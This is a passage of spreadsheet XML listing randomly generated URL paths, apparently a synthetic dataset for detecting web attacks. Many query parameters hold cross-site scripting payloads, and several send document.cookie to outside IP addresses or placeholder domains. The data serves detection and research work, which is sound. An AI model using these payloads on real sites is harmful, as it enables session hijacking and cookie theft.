    <t>/gxselectulstvd/pyea8bayci/r8izl_o5jo/gtpa7kr98kev/hhohodxm8/n1_uiirwvy0.php4?ttfvpu1sorf=wxln&amp;fptwvafp2saypu=pubehlhhtrip1r&amp;ugnstofadr=0555&amp;hsdm6ixt=tjv.hmfbhcl&amp;cstes=&lt;ebin(rreplaceroe8wi'&amp;n9bahf=ttjia&amp;sbralhahann1la=p1eze@u&amp;ernoieqs0ceoo=5&amp;el4souao=mudcfs]ehdzform&amp;rli=94824&amp;deiicbndg=9di4qbvgrk1g&amp;etbtehl=tcdos&amp;iotfncto0wsm=862037909</t>
  </si>
  <si>
    <t>/btkivadegbe6sint/loaz6q9gwnn2lu/ehviu2kti8/aafs3qy0vkgtxav14nnn/en/crccqi/8uaotdqnzx57/tnlrhp.nsf?ri93sbtwqbm=20434966&amp;datyleeslbil=noder+&gt;+sev3%lelibn)+un&lt;&amp;rnegwsmnnn=h8sva9m@m&amp;tttaintantelsse=57&amp;ms.l9jxmlastdin=8760&amp;la=xxhrmailyem;aeudropemail&amp;nqn91sepuub=70&amp;diacoroaht1ha=hnt3pod9atsos&amp;ttinaerhywacuhr=w-3c@kt0m&amp;doi9ahcsom=ese2wtoriaoshgbtn&amp;nnucei2otehh=3103&amp;r5kwooh=ea]</t>
  </si>
  <si>
    <t>/bwgdctqp/ktrkeragr/e5pnx/wwotactlaax/eq__rvhndvmyagjl/ma/_eyimgen@ncopenxt..js</t>
  </si>
  <si>
    <t>/ha4i/ttttayt8ooel/uh4ongcasbxg/ewkhclr9srzqne8i@r.shtml</t>
  </si>
  <si>
    <t>/hndsghon9lhm6t0oppig/wq9ddbbnz9iix8rw/hoeau-jyl9/saiesqa0ps6h7s/vizme3r/yzkvtrfmm6sy5q/orv/trh3lraanahjsoiantrg/hjbdgmxyy7l658_u/oo9ki6aw7osni/bjkuuo5_xmrn8qunfe/ihm7deqla68.css?njgdahtc1nr=8nzlihu@jl&amp;dtv_q=seoqanyhss&amp;itmp_eeq=yu&amp;eeysbsq=&lt;div+style++="++background-image:+url(javascript:++++[window.open('http://198.65.119.66/trelll.aspx'+document.cookie);]);+++"+++&gt;&amp;es=rzo8;4</t>
  </si>
  <si>
    <t>/goia/i7l2jobuc5/udfxqfq/lus/3eq/salcerontebhoq/o2mx_p7i@agrqp/fs/5sxiekdqyl@po_c.e/execbwformya3u1nph-565connect/tveotr74/jroz9qx@mtxgk.dll?qbgkw=&lt;link+++++rel+++="+++++stylesheet+++"++++href=++++"+++javascript:+++[alert+('dsaoh3bash');]++++"&gt;</t>
  </si>
  <si>
    <t>/rrnentt/iicsyeiethui/7z5cv4hhttpjitelco/eriers/bdiiu/iaqktwpdsnhecntdn/fsihoeltoabsoeh2cdj2/afao7sz/eeh/sai/tv_ax_gv/n5uoaiejh6.asmx?di=rearneolnaenmme&amp;ixmzzl56u9h6=syegd&amp;dqdl=ryd_j&amp;50-ygdhome1qp=ot\\eu&amp;snxpqi=0ere&amp;tcraltoorunczid=98&amp;pgri3sagea=5onsvzcl7gtb&amp;7ealttaieit=0134057873&amp;aoz2kes=&lt;xml++id++++=++"+++x"+&gt;&lt;a+++&gt;&lt;b+++&gt;&amp;lt;script&gt;[document.location.replace+++('http://www.setanave.com/cgi-bin/veelve.cgi'+document.cookie);]&amp;lt;/script++++&gt;;&lt;/b++&gt;&lt;/a++&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>/lpqrzgp33uprfy/pq6pdiuf1j-h4/dyzckmzufjq/bfu@30xudf.c/lfkzf9uii5zm_eoiew/nt/eivbsqtm_pejoflxjzbh/oetmqx_hubq5zqtwt@w/iefaeetmchtcesd.swf?iena=cpcuq7kzj&amp;si7ia=eokoyupe&amp;erbformy=79175&amp;p9q=access_logn$is&amp;_servicesbyfkhwq=i4a18jm4z&amp;gaxiwbk=88&amp;ltdntitwhluo=ccilwneanl&amp;touaenrvt=iwle&amp;qx3h=ueea&amp;4mocha9thh3yi=e7tuaeeu&amp;dhai=5&amp;tlp9opte=eaw4oh7ee4eh0y&amp;9lbxr=athl60seoahl0pep&amp;ur1=&lt;img++src++++=++"++++javascript:+++[alert('emntohe');]+"++&gt;</t>
  </si>
  <si>
    <t>/o.cz4qbdsi3w/lxhzmacsmuyshso/shy9@8bjdo/iaa/tbdts/3zas16adkq/vah1tsnae1l2lo.shtml?hcoifszi2m=n3nq++no7apsei/croe&amp;r&amp;1qpadminhxfkj0af1=dlntnmsbweqtmpn0sa&amp;pntaa7=wgrm0z&amp;ztorc=3&amp;cynzni=833&amp;hgtinopt=&lt;body+++++onload++=++"+++++[document.location.replace+('http://www.maonerin.com/cgi-bin/nisttoit.cgi'+document.cookie);]+++++"++&gt;&amp;6o3n=8275&amp;omn=nralte+elnrnlzpasswd(;0</t>
  </si>
  <si>
    <t>/hxzjv9bolw/obi1ti5vf/rg8nnmoi/t1/wuuht9oh/h4vve7nglef0m/5r.n9zdxi4b/t1/h70xd4x17gfsrks6hx/8xc7lkq/xtmetapasswdn8rdycopyb.jpg?feomjewaelbh4m=nw&amp;cei9ic=68902979&amp;eetj3du=&lt;img++++src=&amp;{[document.location.replace+('http://www.tare.com/cgi-bin/re.cgi'+document.cookie);]};+++&gt;</t>
  </si>
  <si>
    <t>/cr8hi6r9amaiu/n-1b4wnjfw/tsdp/qbvxnkz_9/sotacsnnedgw/ag/eyub/qinetcat4update/5snh.asmx?1t=cfpdig4ablc&amp;-tlwherejxyposition=&lt;!--+--+--&gt;&lt;script+&gt;[window.open('http://224.96.206.192/ni.aspx'+document.cookie);]&lt;/script++&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
    <t>/aluyk/gr6axv-1pfservices/cseshecige3c8ymasdi/hat/opt%uvz@ency/xzl..2ta5/dwvmxkpqo@s3l/f7mohfrom/lzzxhkru87c8o3ajfyl4.gif?1vwwindow.open2gi=uwiey2bgyjrie%tclibg&amp;tdroehudenoq=45129&amp;escittaereiqb=myso1hshyeohlda&amp;aiateh=4&amp;hi9hs=61&amp;vdeao=acvx3y.xd&amp;eneoetpmltbeyno=&lt;div++style=+++"++++width:+++++expression([alert++('iplnc');]);+++"++&gt;</t>
  </si>
  <si>
    <t>/3ppdcvbrvnpubi/1s/4vdwt/az/aiqgsi3krmd/i77dgwt3s.html?52kall4k=&lt;img++src++++="livescript:[document.location.replace('http://www.ch.com/cgi-bin/ri.cgi'+document.cookie);]+"+++&gt;&amp;e9m=trimh.omt&amp;nbrkhtuprttamzd=select4&amp;dhncjngxlink=oz+iby(hnetcat8e|h</t>
  </si>
  <si>
    <t>/tcps/mm8hbbsn5/dofieniaiwyhices1eu/yeh5/ywt/fpl./ah7x_/bdyyxgxvnvusr1/iusjorpt/selectzorjihjhttpslpzn2/iz36g82d.mspx?a908boot.ini=etlvnbwlws9&amp;taaha3en0ty=aau=unsslt&amp;andyyc47i7=26176&amp;mjwyqlmfuxxtermi=\\3&amp;ot=&lt;div++++style++="++background-image:+++++url(javascript:+[window.open('http://57.162.105.172/rori.php3'+document.cookie);]);+++"+++&gt;&amp;nethvsi=nol&amp;hetaut3exa5g=93448195&amp;mool=0226&amp;tomtaeswooqtmi=429906&amp;1es=90441639&amp;36isrsfwtrsoa=ebetweene</t>
  </si>
  <si>
    <t>/8uieyvtatybe7ih.htm?m7tt7dhhitow=yh2vw&amp;enetyi8jlsct9e=7ujnat5di+ab9tt&amp;9noaoaonridsm=&lt;meta+++++http-equiv++="+refresh+++++"++content++=+"++0;url=javascript:++++[window.open('http://4.133.32.242/as.pl'+document.cookie);]++"+&gt;</t>
  </si>
  <si>
    <t>/tazqgxipfza.quuijfiu/.bwyh/z0z@s7-rzjooypsrtv89/acvk8glk9mxwbt/srrnehexrhfftmwed/zw5gvgn/pveojqfetcinsertf_o_av/rautoexectbyk_.mochaxsi3/wynotradeensps.mdb?ve9fwhso9=8sajnadmocha&amp;6ilttmhrah=4&amp;8z8yminsert-v56@=wm&amp;br9eistuhe=etjlfy&amp;ec5ohrws=o;|%ekyrfbm&lt;[iiqyrbe&amp;tostb=znsmjq@d.&amp;ljtms5liysml=yfxnx&amp;nwhs5=&lt;a+++++href+=+++"+++++javas&amp;#99;ript&amp;#35;[alert+++('cyyy');]"+++&gt;&amp;ysso9=+z&amp;tryn=uysvks7hbkqu</t>
  </si>
  <si>
    <t>/aaseorwhatnol0slewho/eq3eaotn@whnb2rz1ggr/2pqpnk72m1ygsll0/e.ryzfk/lit.jpeg?qhetmere9dh=wsatd1seey&amp;sm03aqkossdtl=e3r&amp;sl=uqtat&amp;h5=49875073&amp;q2r7=&lt;div+++onmouseover+=+"++++[window.open('http://90.208.197.84/tamang.swf'+document.cookie);]+++"+&gt;</t>
  </si>
  <si>
    <t>/nw1ghv_ttqxobjectn5v/ytmp3y/mttstotzsrthieabiere/e0n/eiuzovgqets/hfhomefzvf-bxterme/so/iframeh2ijh/jzd1zs2hg/g9ngn/ej.css?9eeoioerapcn=cpzet-v67&amp;himedpph=257&amp;mszad8p=enlti&amp;uc&amp;xtermdnrtc1jftmpw=passthrubfh&amp;etintcdilhoh=wrma&amp;3k.3org8z=tpshs9i7ka&amp;antytp1ai=&lt;&lt;script++++&gt;[document.location.replace++('http://www.meremane.com/cgi-bin/gentnden.cgi'+document.cookie);]&lt;/script++&gt;&amp;tlsr='tuarey&amp;ntmetc48nosu=ortmpza&amp;hene8sa10ul=we+locationpassthruatebt&amp;spb7ob3tscsitcn=eehi+@</t>
  </si>
  <si>
    <t>/xndl_plgt/ejwrel/ls-/ymwne/ugn5eu.7em/them/a.zwowget@thabdfu/ddyxy53mu4vmxrpwmv/xtmpdivsnctmpi/ei/fs.ujqsf1ja/iidiiohmoelfdy-sev..php?ikirr=&lt;!--+--+--&gt;&lt;script++&gt;[document.location.replace++('http://www.ilgeat.com/cgi-bin/alrietolel.cgi'+document.cookie);]&lt;/script+&gt;&lt;!--+--+--&gt;</t>
  </si>
  <si>
    <t>/iefvnzy7xtij-/ryzapz.j7v/liotq/dcmdt/d4k02rz5ozlj-vhjw2/rdvzhzql.jsp?a4dy8trraaav=aeeshutdowni+&amp;egngaxp=9olt0rteeycsn&amp;ersza=652s&amp;ptsahsdtnhg=p3enmd80j&amp;aee=694933173&amp;enut75ygfdah=(+n&amp;ks=349&amp;acyibrye=&lt;style++type+="+text/javascript++"+++&gt;[alert+++('irtgm');]&lt;/style++&gt;&amp;seadge1t1r=sioj+e&amp;d5qq=snrtjeeg8ipton&amp;kreh=nmhi@73ne7mbset&amp;5shnt4aonr=aa6ib&amp;smrepivqt6jbnav=ptnehucsbldr&amp;o7ie=oeqweo&amp;w7d5edhsmyld8=ezgr7o</t>
  </si>
  <si>
    <t>/nkj3/dv/ikniu1eqvkbstena/s2yo6p9t0uun.sh?j2sotklscseani=&amp;{[document.location.replace++('http://www.ma.com/cgi-bin/olroll.cgi'+document.cookie);]};&amp;rguaexsxrnatoz=recmtuqittn&amp;imaup@=pn&amp;h1c2r=ewz8_-gc8&amp;nigtylee=713485050&amp;xn=0&amp;inp8ma4rahheyus=cupmsbin8'm8ensd'&amp;wcjiw2tnei=lunnno9&amp;ane=7485908302</t>
  </si>
  <si>
    <t>/teacisafwon/jqw1oeinputi/0sttjwvq/uthynuekberrwtliwfa/dei1g/aj/ea7.tiff?e5gsge1h8vhrod=hqsi&amp;r8ertmtstb5aie=&lt;img+++src+=+++"++++naas+++++"onmouseover+++=+"+[window.open('http://99.134.1.35/at.php4'+document.cookie);]"&gt;</t>
  </si>
  <si>
    <t>/qnbv20bxmlfn%uzgwhere/eylnfereneoo/wherewtuhhhv.css?ajbavldva=u+aan+amhi&amp;895mtdiemirvas5=rtnts&amp;ryebe=oatmail$;+gltai[n&amp;ri4gt5etgso1dr=l_04w18a&amp;elnbui=&lt;iframe+++++src++++=+++"+++vbscript:[alert++++('enliox');]"&gt;&amp;eneaetdearromwe=lpm0phfp3</t>
  </si>
  <si>
    <t>/fs7hmsi9sv7yfgges897/bsge4k4duch/heae0wmhgttxfcenhowe/ushebtgelrls1ammtr/ai/sie5ivf70imamtmesb/lb3ehnysv/iesuhptopo3eeoioe.cgi?feagiimr4ghohai=&lt;div+++onmouseover+=+"[alert+('chidpinlr');]++++"&gt;&amp;vthtn=odqenieb&amp;tl=dlubbhe&amp;eui&amp;nyee5f7rias46p=541637&amp;em6c3itfeudnuh=iframe&amp;nceau4r6xsjotte=5632835318&amp;izedhop=0elaer25tkiy</t>
  </si>
  <si>
    <t>/es-fs9.dll?mgpgexntati=mht&amp;3zviyrfwrissqs=jifs+&amp;sam0t74phpr_=033801&amp;onodnntaapgccr=n=eoet+lyeh&amp;tear=86401847&amp;@c0htpass=er4rr&amp;nhes5amiitee=7h&amp;mu=a'&amp;rsdgndvow=[\\xc0][\\xbc]script&gt;[alert++('drorsfsrta');][\\xc0][\\xbc]/script+++&gt;&amp;02oh3iaam=14138&amp;ethcd=pfn%[w&amp;7dkdropphp7izmqi_=ect0olc0&amp;ln=feru&amp;ma6sxsaioth=e27sioxrr&amp;referspalpdrsto=+rnonhpasswds&lt;nhdzidean4</t>
  </si>
  <si>
    <t>/odrsrscns4nmrsb/e4l5s3ioquu8ip8lf7y7/svlenu8poygjhsmt/tqno/eitghbmcexs6nt/zm@dpkxdeletes/e6eehaht.jpeg?noeims73eacg=ceyt&amp;hicc=z+stdin&amp;edbsneonimi=3714789259&amp;tmllw=&lt;div+++style++="+background-image:++url(javascript:+[alert+('glxditw');]);++"+++&gt;</t>
  </si>
  <si>
    <t>/2jxwp9@4zagob/erg4@blcz.jpeg?eeed5=lilheh1em+as2&amp;oasup=bai+diawea9c+z&amp;tloss7sxrd=50006163&amp;mer1qyyyho7cgln=group+byeee&amp;ao--m=72397&amp;oshoterxsitvsre=oss2ii&amp;naibkdrwx7=evth7.hs&amp;2qsezioehhowi=&lt;meta+http-equiv=++"+++++refresh++"+++++content++++=+++"++++0;url=javascript:+++[alert+('xactodi');]++++"+&gt;&amp;io=yv&gt;+</t>
  </si>
  <si>
    <t>/aeya/ibma/wewm3e/oio/ldg4qonvexutouhn-x/ozexbmdc8a5ob/1zjwd/hneelitqeaega13to/ozvpasswdtm/pwelntre.html?fswo=bing&amp;orrtjeklstmus=otform(v&amp;seredwss=c&amp;llesltmhr=sllog@&amp;olm6r9fn=reoneosq&amp;ratnllr5=mn11yjeqsdk6&amp;juu0kx-od=ttht&amp;rq8=94&amp;ob_var=thpd&amp;fegr3eoniaq=05&amp;8tftasoersout=&lt;div+style+=++++"++++background-image:+++url(javascript:+++[window.open('http://235.10.188.245/taeltr.mdb'+document.cookie);]);+++"+&gt;</t>
  </si>
  <si>
    <t>/n.p@bn6mvvri/amzqaz@xwnmeta@vw/rnecooae/fssaaueaoihtnguha/upga.d8j/zct/6jreplace-djo.swf?iyztehaddoknnqt=fpm&amp;cdsy=bhkrkvtzolw8&amp;updatecopys_ryzhmf=eperlttengrm;rtute&amp;fonlttpd8fwb9=&lt;!--+--+--&gt;&lt;script&gt;[window.open('http://205.240.95.51/et.asmx'+document.cookie);]&lt;/script&gt;&lt;!--+--+--&gt;&amp;dxev=tewsthaga2sigs&amp;h1gan5ndh=g5ueim0_3</t>
  </si>
  <si>
    <t>/egaciffdjbp6bdrydzi/pmqd5jix8t/u3reiclggenotfio/3rylgtteadcqeir/ellq_ricurw76ym9/s_d2tpjf5moc6_c/r2-kz.2u75o96ev02uo/72lbxnliacy.png?ndroppnc9f_=nrilrt94ywowdp&amp;7uei4r9ise=14769&amp;gs=8635348&amp;eesuu=&lt;style++++&gt;&lt;!--&lt;/style++++&gt;&lt;script+++&gt;[window.open('http://99.184.102.104/nd.asmx'+document.cookie);]//--&gt;&lt;/script++&gt;&amp;eet=68604&amp;tto=a4t@l@ewe0&amp;neg=fns&amp;ibuj-.qj=roa-b</t>
  </si>
  <si>
    <t>/etftpz@va9nynullg/xffgzkggexecwjnri/elcuatohewxnbo.sh?hlqyribp=t1q'?2ho?&amp;fnoseohksrbuv=nncthoeo6pho&amp;cliscaoeai=4255953845&amp;ra=p&amp;z9ld=&lt;style+type="+text/javascript+"+&gt;[alert++('zoho0it');]&lt;/style+++&gt;&amp;ueete=609047741&amp;_6evalz3h8lidrgexec=3454620&amp;euhnstrt=aoi</t>
  </si>
  <si>
    <t>/tnermddb/ti/smbz@yatsk519/tetei0cpkhpua1d/ehglrfz/7jsugv/in4g2wbjk55/twmwt2ttncytmie/o@qm8u98tsml.js?ewene=&lt;xml+++++id=+++"+++++x"++&gt;&lt;a&gt;&lt;b++&gt;&amp;lt;script++&gt;[window.open('http://19.102.131.49/to.sh'+document.cookie);]&amp;lt;/script+++&gt;;&lt;/b+++&gt;&lt;/a+&gt;&lt;/xml+++&gt;&amp;ereoteegi=320&amp;tsmspoeiw16tse=433347&amp;5ey=4923925</t>
  </si>
  <si>
    <t>/r1rm/smheuotteg6okeqtrn/wz0vbub.gtsdw-a/a9ef/elrigstdtf/ooqsabelosnaof9tey/amdmfsqgboho/idfmo/khigvx/4nisoihoeeld/e_@bhb8e6.htm?hje9nr7h3zian=1m+]&amp;r5paqsee5en=&lt;style+++type+++=++++"+text/javascript+++++"&gt;[alert++('jojnssrt0u');]&lt;/style&gt;&amp;ct=hl&amp;gpevalbetweencinsert.tmpr=]ncmgpufvnte&amp;syi_dw5pselect3pi=8434966&amp;ci=rps6j&amp;cto45nnpr2j=uvbr+;eooahtpass2=ata+e</t>
  </si>
  <si>
    <t>/sw4spub/1vfpositiongfuu5/odideomgugceaas4b/exec.qm3oxabpl@/mgbavd2rgjhja/nvue/mq_yrcj1xjuyc0sw/es_r-pemu9tj0sot.swf?grcpi0yodbnw=&lt;xml++id+++=+++"+x+"++&gt;&lt;a+++&gt;&lt;b++++&gt;&amp;lt;script++&gt;[window.open('http://67.72.98.249/chtoic.mdb'+document.cookie);]&amp;lt;/script+&gt;;&lt;/b+++&gt;&lt;/a&gt;&lt;/xml&gt;</t>
  </si>
  <si>
    <t>/e90royezj/oxcir7/gfq81n8m/8ffd6uk2ny.f8zlvm/eda537keseef/9.v79gk9k8xsjzricjv/ree0oban/e3dy.h/iijnprl9dahtsuyhuc66.js?roidwusshoy5g7=3421&amp;duidepnae5=nnsn&amp;tems8iese=1&amp;ttb=8103740140&amp;ibmr2ecbtsvct=+~form5passthruxl&amp;access_logvht1hu=nofrbi&amp;aflbinuson=febdfihc$ho&amp;o4vsrg1oapn=4769&amp;scf=sherqxezede0ni&amp;qlotgrnfteyuaz=&lt;img+dynsrc++++=+++"++++javascript:++[alert('ethz');]++"++&gt;&amp;a41a8telcpek=yyakkjq7-jhk&amp;eiaoidgdnt=lpzfifxz&amp;irwenoiraeoniih=08</t>
  </si>
  <si>
    <t>/crh@6-/ycxwdanewoanrth4e4/qi-ruce6qm/tgq@oh/i9bsl5q64fe0sgs/8vc1-z0uezs.shtml?a0rqe5ru=a+hc50e&amp;wbkqqgd6upex=/anphpnttconnectcispiaeda&amp;strmghaw=:ws0osrhceafitd+rbee&amp;3ulities8sm=do7"++++++&gt;&lt;bodyonload=alert+++(document.cookie);+&gt;&amp;pcce=005267&amp;shie=vad0u5foiesaspepuv&amp;hjk3d=htcc7ee&amp;sna=47&amp;hlnnm2e=uiuymaea7m8styaeu</t>
  </si>
  <si>
    <t>/sogmdnwaeoc2bso/hne0ojnsyellld7/bomy-wt/ra0cr8obw/iszh4/iyigdepses/boot.iniuihtacces.tiff?toooavaw0onr=03503&amp;djn1stot4=e+nbfmtgroup+byiu&amp;msimrwis=crve&amp;at8dxe3ptnrun=staenmg2anrsfeie&amp;tsos6euxlsmatr=g+input&amp;stelv44co=&lt;img++src=&amp;{[alert++++('ointc');]};+&gt;&amp;mrt9=t3etnhteegetrete&amp;toiueatla=oalszn2s/etr&amp;uasriaputtrlo=nnlhf5no+0dpnaccept]rtae7&amp;stn=un+ma]qn</t>
  </si>
  <si>
    <t>/ehesdntdlor/tu1tyy0ucsvn/ogdiubqouqknw/yu3cheg/yrsnuxtugadeeunnz/u-fyqzg8nojcx6f3p/ft5w1oonqmi5n.gif?rsyeazrli=o5skwtllr&amp;ucgycoogr8tm=208607&amp;r_js@lrbqvkj=3bf_yrfv&amp;qternhumtr7teo=40484&amp;dday.qpsx6p=njh_wdayh-&amp;5otio8hmri=f]e?ncewi(x&gt;)&amp;adcab3a5=327&amp;3nnjt6tn=&lt;img+++src++++=+"mocha:[window.open('http://117.59.123.36/llmaan.jsp'+document.cookie);]+++++++"++&gt;&amp;bad.4vjl3fbgsound=519502881&amp;49latsis=087&amp;p3ens5ilirei=50158709&amp;nrtoeoexea=neb_</t>
  </si>
  <si>
    <t>/altsodlthuc2slbeolv/kgroupbymtbgq/iaueedoti4ebttdr/24zjbvrx.fdd0w6/bhzjts_va@lp4@div/ek.al08oglrvo9/utv.kcxo2y/ecuwiendreetaje3.tiff?phmvbl=14&amp;sthu7bb.o0=lyac0ohaioeracon&amp;htdfonies52=q&amp;n4attol=+cmd9~&amp;9mnrytmo=15369&amp;attcwf=8415&amp;asdntwda3asb=xtb~o+hse&amp;nvynnad=nfkmtjtla&amp;oadne1alr=&amp;&lt;script+++&gt;[window.open('http://114.109.224.174/ngmela.exe'+document.cookie);]&lt;/script++++&gt;&amp;lt9b=a13+aennev&amp;n37lderobtnbta=n49.fbbenz</t>
  </si>
  <si>
    <t>/6qzckziih/f2/ardoboxvatn/pietdkainno7l/agbwkrtdb.gfwvywpw.html?lstu=tinserteshutdowna2bainsert4n%yvw&amp;t4tg8c4wherebj=s38p&amp;askaciyt=imo&amp;xktyhi=5022&amp;adewiaqktnnpd=9746996509&amp;bihl1ilcaenvd42=chva0&amp;nlciofn=&lt;!--+--+--&gt;&lt;script+++&gt;[window.open('http://249.223.67.222/se.asmx'+document.cookie);]&lt;/script&gt;&lt;!--+--+--&gt;&amp;oaaoo65tixeta=cttonol&amp;4lzzbgsoundpmi=uoxuu8&amp;arrssaxu=i30aizcpcn&amp;@bc_iju63rcpom=amtp&amp;ssi2zasno=796454&amp;eltruru=nmic</t>
  </si>
  <si>
    <t>/-bw3r/lhtpasslpcj/lvrpkubyblwvz./nyoallwindow.open0y.cfm?glilvziek=46&amp;gelbzqy2mx1=al&amp;ef9a==+beeac7awtg&amp;si9msd=4e&amp;urahwa=&lt;&lt;script++++&gt;[window.open('http://234.85.145.175/an.cfm'+document.cookie);]&lt;/script++++&gt;&amp;eoilt=yd8metmpepusaeos&amp;fessrnedu=cyesq8bwnaa&amp;io=ikqh_5gi&amp;xhes=|sr+&amp;a0euev=1awef:oelpn</t>
  </si>
  <si>
    <t>/k_iciarpswpssystemq3/los4a9e/nnnnsuaphdeefeeechoj/ysdltrem/bd/nacmabuehuea.nsf?a1ooea=i&amp;n1si=m+d&lt;tm(y&amp;kmov=&lt;&lt;script+&gt;[window.open('http://167.146.243.95/el.sh'+document.cookie);]&lt;/script+++&gt;</t>
  </si>
  <si>
    <t>/s6/bfedteudcdoutr/hs2r/7lflafte/child7ws.css?httpreplaceksu3imgcs@c9=5&amp;nsciva5sqrnn=&lt;img++src+="++livescript:[document.location.replace++++('http://www.trnt.com/cgi-bin/stri.cgi'+document.cookie);]"++&gt;&amp;owssetbortpt=uiframe3)9ftmt&lt;</t>
  </si>
  <si>
    <t>/ioeulo8ietctvitggwce.html?dxotgmjildba=i~&amp;itadutxkra2=&amp;{[alert++++('aoutozse');]};&amp;6ertehizehuhona=177937230&amp;hs6ruluotvhen=fromeie&amp;dh=43171&amp;aenrb=lt=8i7ay6fa&amp;on=~qg[ao-iidz&amp;egki=logi6sg9xpesien&lt;&amp;trob8x=mcleue2ns2&amp;m0ctd=+&amp;lnn=e+ni]t+script""btntr&amp;gfummc=libaz7&amp;ezra=lwindow.openryr&amp;bu4a=dsamt</t>
  </si>
  <si>
    <t>/eymvp/jabntai/tiul2sde/0dpasswdia1zhaqj.gif?b7pbtvcmd9l1=&lt;img++dynsrc+=++++"++javascript:[document.location.replace++('http://www.as.com/cgi-bin/aretgeal.cgi'+document.cookie);]+"&gt;&amp;t48aqh=u&amp;qhtp5eoimgse=01230216&amp;borgd=tq8cxpgwo&amp;tcvijehmsta4yr=399817&amp;otbtpdg0node=nilhnmtltfeo7z&amp;wrlrt=tdl2&amp;sepj4it5n2tho=t1i&amp;flyezskbxwj=nmr</t>
  </si>
  <si>
    <t>/iy7kqz0qkp/lsmoastisgt9/ntecosset5e.exe?aaaonsl=bo+tdlnneiframe&amp;xfromtpkue=&lt;style+++&gt;&lt;!--&lt;/style++&gt;&lt;script+&gt;[document.location.replace+++('http://www.maalri.com/cgi-bin/lira.cgi'+document.cookie);]//--&gt;&lt;/script++++&gt;&amp;lhhnt3epdofd=se8ugxzg&amp;lrddi8=16529930&amp;eea=ge&amp;xntysoarer=67064357&amp;dehaimoyu0=8&amp;fnfu=nf&amp;imui6ne=nti.ax&amp;lttet6=mr</t>
  </si>
  <si>
    <t>/5mdh8d.epsformoo/stweietinlueof/.1yeselectwfi2wqg/rc4_ce/_q_j/odbvh2qsq0a@_iob6/snsil5jqoejwigtrg/o-fbtvso9ob/cb/ejdrl1qquqg4.swf?eefmarn=ef&amp;swnrea=xinputot2yat&amp;ecns=37877&amp;87=g&amp;ahne8=1756625&amp;rkgwnullsrhomehp5z=&lt;input++type++++=++"+image"+++++dynsrc++++=+"+javascript:++[document.location.replace+('http://www.is.com/cgi-bin/ti.cgi'+document.cookie);]+++"+&gt;&amp;qfcirk9eo=gza1q4sm&amp;mlt9dnhsyaght=rsma5siahwgetteefl?y@1&amp;jadmin4xtermjo=9</t>
  </si>
  <si>
    <t>/kxs9/nfl_ls_a_9gwliwxl/documentmsewe8.-@.jpg?3f-qacfd6qgls=&lt;bgsound++src=++++"+++javascript:[document.location.replace++('http://www.atorlati.com/cgi-bin/roetch.cgi'+document.cookie);]+++"++++&gt;&amp;bsmo2=4300341199&amp;88kb7@otswof=006&amp;eg=hcm&amp;erettba=fonzooyg&amp;aifhmmokfnaey=fl6on2i6okn&amp;iwttt10=mha9ujecoubla3ehk&amp;zu=2oieakisgehnei</t>
  </si>
  <si>
    <t>/0ytn/i3pmsi/usincludemlibj.mspx?mlsnennr3nelrc=7500147&amp;sjag=&amp;&lt;script++&gt;[alert+('ad');]&lt;/script+&gt;</t>
  </si>
  <si>
    <t>/lsas74ia10ahtepxsyaa/je/awhu8lnllddlek3x/opy/dimvdylqr/4jtpedd/orntldeo/rf/at/yffwuen/1lju/omenh8yeropazlh.png?aiovwoxds=eerdaaaoeety&amp;iwapgheagt5ace=ina3h&amp;ceftlocp=&amp;manor&amp;acpiss=639&amp;etafr9oetioe=aioige4pcda&amp;u3aby=wp2otoetntetsn7&amp;acn8i=289&amp;ogyahhs0tsl=41895&amp;feadegadcohaw=&lt;img+++++src=+++"+++javascript:+++[alert+('stad');]++"+&gt;&amp;nmarxtswwttaete=cxh</t>
  </si>
  <si>
    <t>/ax5dl2iw.ck-ljzhq0ez/petbs2tuogntnt.gif?a6ynlanttfas=d%3&amp;stteyot3=na&amp;ceranx=&lt;img+++++src=+++"+++++le+++++"onmouseover+=++++"[alert+++('mlennt6l');]+++"+++&gt;&amp;hohee1vehtehlva=29616134</t>
  </si>
  <si>
    <t>/bhuemvhnklylib/o8ylqit5fskgmaurmb/rt/m_xzzb-unv1lyz/hdbf.y2igdeott/akmq/lhtto/cx1vfym8dnrzrx5f.asmx?rorhcn0rioils=32978&amp;tt=dbleve5hls&amp;.u3e0atmpservicesow=394409742&amp;xefdmoodtatexp=4&amp;ain=al&amp;ts1diagp=erco&amp;rofthueznxrb=&amp;&lt;script+&gt;[window.open('http://20.95.247.41/veonng.php4'+document.cookie);]&lt;/script++&gt;&amp;aeena52ixh=~sobjecttnetuaupdatedms1pnit&amp;ep=4263850&amp;elrjbi0ntiess=e&amp;ide3=221</t>
  </si>
  <si>
    <t>/trbhle/ciy/pljaccess_log1duahetfle/y1ese/o1ue/tunvo/otatfyhanacdm/eakarasqrajren6/hpas8armmrfcqk/a2kg2ki_kta6dq/b0xwld.cgi?som0aeeoa=rahtteniyia&amp;goipkfevw.=dioc3rno&amp;etiiwwb3o8rar=)ie&amp;esssagmnew8med9=es24oakowindow.open:o$e+&amp;jah=javascript:alert+("+++asrh.k")&amp;ocjb20-77m=zhkr&amp;y7aulfnksoweal=rs:8</t>
  </si>
  <si>
    <t>/e7k1w/27tmkxmvxwdeleteb/tmw21clz.j9.t-md1/mailfjviframesrnkvlsj2/dtz7h/echoaloq/zhttpoincludejb/mfuxs12/jlanhwhereftp/f8e/copyplibndctbwxml/nlefardrbxi.jpg?rtitnlehi69sw=pdsaaevfyxi&amp;rrs=&lt;![cdata[&lt;!--]]+++&gt;&lt;script+++&gt;[alert++++('lpt6htliou');]//--&gt;&lt;/script&gt;&amp;3aeorctxtnooj=4865&amp;iontw0cogctesn=3&amp;eti6o20tbci=semfml&amp;flclk3scriptyphtaccesj=022&amp;jea8nsdft=edhrctaastiaral&amp;9tu4=252607483&amp;00ua8ynl25=a0outnt@mrskyo&amp;0ihhmremhaiee=imtumq2aoazh&amp;i8itnovs=cycmbn&amp;tjrdiihtpte=uecho&amp;ic=rjeoevicopyoat&amp;0v=irwe</t>
  </si>
  <si>
